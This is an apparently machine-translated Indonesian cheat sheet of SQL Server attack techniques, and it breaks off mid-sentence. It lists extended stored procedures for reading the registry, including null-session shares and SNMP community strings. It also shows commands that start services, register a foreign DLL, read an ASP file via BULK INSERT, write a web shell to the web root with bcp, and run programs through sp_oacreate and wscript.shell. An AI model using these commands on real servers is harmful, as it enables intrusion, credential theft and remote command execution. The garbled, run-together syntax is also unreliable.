Beberapa ekstensi SQL
xp_regaddmultistring
xp_regdeletey hapus nama kunci
xp_regdeletevaluate nilai kunci
xp_regenumkeys enum
XP_REGENUMVALUES
xp_regread untuk
xp_regremovemultistring
xp_regwrite menulis
drive tampilan xp_availablemedia
Direktori Tampilan XP_DIRRTREE
Sumber data XP_ENUMDSNODBC
XP_LOGINConfig Informasi tentang beberapa konfigurasi keamanan server
paket xp_makecab, beberapa izin DBO dapat digunakan terlebih dahulu
xp_ntsec_enumdomains enum informasi domain terkait
XP_Terminate_Process Proses Terminal dan IP
XP_LOGININFO saat ini akun login
SP_Configure mengambil konten dalam database (saya pikir ini cukup berguna)
sp_helpextendedproc mendapatkan semua ekstensi penyimpanan
Pengguna permintaan SP_WHO2, host yang mereka masuki, operasi yang mereka lakukan di database, dll.
Beberapa informasi jaringan
execxp_regreadhkey_local_machine,
'System/CurrentControlset/Services/LanManserver/Parameter',
'Nullsessionshares'
SNMP Assisted Network Scrutiny
execxp_regenumvalueshkey_local_machine,
'System/CurrentControlset/Services/SNMP/Parameter/ValidComm
Unit '
Mulailah beberapa layanan sistem, seperti telnet, dan Anda dapat datang ke admin atau kata sandi sistem.
execmaster..xp_serviceControl'start ',' jadwal '
execmaster..xp_serviceControl'start ',' server '
Sp_addextendedproc'xp_webserver ',' c: /temp/xp_foo.dll 'Ekstensi ini dapat menjalankan program
Gunakan sintaks 'Bulkinsert' untuk memasukkan file teks ke tabel sementara. Cukup buat tabel ini:
CreateTableFoo (Linevarchar (8000))
Kemudian lakukan operasi Bulkinsert untuk memasukkan data ke dalam file ke dalam tabel, seperti:
Bulkinsertfoofrom'c: /inetpub/wwwroot/admin/inc.asp '
BCP "SELECT*fromText..foo" queryoutc: /Inetpub/wwwroot/runcommand.asp-c-slocalhost-usa-pfoobar
Parameter 'S' adalah server yang menjalankan kueri, parameter 'U' adalah nama pengguna, parameter 'P' adalah kata sandi, berikut adalah 'Foobar'
Beberapa prosedur tersimpan bawaan disediakan di SQLServer yang memungkinkan pembuatan skrip otomatis ActiveX. Script ini sama dengan skrip yang berjalan di bawah penerjemah Windows Script, atau program skrip ASP - mereka menggunakan VBScript atau JavaScript untuk membuat dan berinteraksi dengannya. Skrip Eksekusi Otomatis Menggunakan metode ini dapat melakukan apa saja di Transact-SQL dalam skrip ASP, atau dalam skrip WSH.
Gunakan objek 'wscript.shell' untuk membuat instance notepad:
menyatakan@oint
execsp_oacreate'wscript.shell ',@oout
execsp_oamethod@o, 'run', null, 'notepad.exe'
Tentukan untuk menjalankannya setelah nama pengguna: